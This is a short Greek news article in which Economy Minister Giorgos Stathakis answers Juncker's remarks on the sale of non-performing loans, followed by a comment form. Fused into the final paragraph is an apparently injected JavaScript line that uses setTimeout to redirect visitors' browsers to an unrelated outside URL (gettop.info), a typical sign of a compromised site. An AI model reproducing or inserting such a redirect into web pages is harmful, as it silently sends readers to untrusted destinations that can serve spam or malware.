Απάντηση Σταθάκη σε Γιούνκερ για τα «κόκκινα» δάνεια

0
8

 

«Ρητή μνημονιακή δέσμευση η απελευθέρωση της αγοράς των «κόκκινων δανείων», στη συμφωνία του Αυγούστου. Συνεπώς οτιδήποτε άλλο είναι παραπλανητικό» υπογράμμισε ο υπουργός Οικονομίας Γιώργος Σταθάκης απαντώντας στις δηλώσεις Γιούνκερ ότι ήταν επιλογή της ελληνικής κυβέρνησης και όχι ύστερα από πίεση των δανειστών να μην δίνεται πρώτα στους δανειολήπτες η δυνατότητα να αγοράσουν οι ίδιοι τα «κόκκινα δάνεια» τους πριν τα πουλήσουν οι Τράπεζες.

Προσερχόμενος σε προσυνεδριακή εκδήλωση του ΣΥΡΙΖΑ στη Θεσσαλονίκη ο κ. Σταθάκης επεσήμανε: «Μετά τη διαπραγμάτευση που κάναμε ισχύουν τα εξής: Πριν πουλήσει το δάνειο η Τράπεζα είναι υποχρεωμένη να κάνει προσφορά στον δανειολήπτη τους προηγούμενους δώδεκα μήνες. Συνεπώς υπάρχει ασφαλιστική δικλείδα για το θέμα αυτό.

Παραπλανητική πληροφορία είναι ότι ισχύει στην Κύπρο. Δεν ισχύει στην Κύπρο. Στην Κύπρο ισχύει ό,τι ισχύει και στην Ελλάδα με αυτή τη νομοθεσία που έχουμε εισάγει.

Ο κώδικας δεοντολογίας που φτιάξαμε κυβέρνηση και Τράπεζα της Ελλάδος λέει ότι ρητά η επαναγορά δανείων είναι δυνατή και σε τιμή κάτω από την ονομαστική αξία. Νομίζω ότι οποιαδήποτε άλλη συζήτηση είναι μάλλον παραπλανητική».

Σε ερώτηση για τη δεύτερη αξιολόγηση απάντησε ότι «η αξιολόγηση, όπως είχαμε προβλέψει, θα κλείσει κανονικά και πριν από το Eurogroup». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here